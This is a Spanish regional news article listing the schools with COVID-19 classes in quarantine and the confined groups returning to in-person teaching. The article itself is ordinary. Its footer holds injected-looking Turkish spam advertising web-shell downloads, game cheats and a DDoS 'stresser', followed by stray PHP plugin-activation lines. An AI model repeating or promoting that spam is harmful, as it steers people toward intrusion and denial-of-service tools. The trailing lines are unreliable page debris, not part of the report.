La región tiene 117 clases en cuarentena por la covid-19


Tras dos semanas de la vuelta al cole, los centros escolares de la región tienen 117 aulas cerradas tras registrar casos de covid-19. De manera paralela, las primeras clases confinadas ya están regresando a la docencia presencial tras superar la cuarentena. Para el lunes, se espera la vuelta de al menos ocho grupos más, además del regreso de los estudiantes de Llera y Talayuela a sus centros educativos.

Este viernes se ha notificado el cierre de diez aulas. Se encuentran en el CEIP Vegas Bajas de Balboa, pedanía de Badajoz, y en el CEIP Luis de Morales, en la capital pacense. Además, en Arroyo San Serván guardará cuarentena una clase más del CEIP Nuestra Señora de la Concepción (ya tiene dos grupos).

En el IES Castuera, Salud Pública ha cerrado un grupo de Bachillerato por contacto estrecho de su alumnado tanto dentro como fuera del centro. Además, se añaden aulas en el Colegio Docente Atenea,de Mérida; el CEIP José Virel de La Albuera; y el colegio La Asunción (Josefinas) de Cáceres, que ya tiene dos grupos en cuarentena. También se han puesto en aislamiento grupos en el Colegio San Calixto de Plasencia, el CEIP Ángel Santos Pocostales de Alburquerque; y el CEIP San Andrés de Almaraz, que ya tiene dos clases cerradas y en formación telemática.

Vuelta a las aulas

Por su parte, continúa el proceso de la vuelta a las aulas para aquellos grupos que fueron confinados los primeros días del curso.

A partir de lunes, volverán los alumnos del aula cerrada en el CEIP Virgen de Barbaño de Montijo, que tiene otra clase más en cuarentena cuyo regreso está previsto para el martes 29. Retoma la actividad presencial el alumnado de aulas aisladas del colegio Sagrado Corazón de Don Benito; del colegio María Auxiliadora de Cáceres; del CEIP Enrique Iglesias García (continúa con otra clase en cuarentena); del CEIP Los Glacis; y por último, una del CEIP Ciudad de Badajoz (continúa con DOS clases más en aislamiento domiciliario).

También regresarán el día 28 los integrantes de grupos confinados del CEIP Santísimo Cristo de la Cañada de Acehúche y del CEIP Mauricio Tinoco de Los Santos de Maimona.

Los 62 estudiantes del CEIP Luis García Llera podrán asistir a clase a partir del lunes, una vez superado el proceso de aislamiento social del municipio. También los estudantes de Talayuela, ya que abren sus puertas el CEIP Gonzalo Encabo (410 estudiantes), el CEIP Juan Güel (267), el IES San Martín (484) y el CEPA Talayuela (32).

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );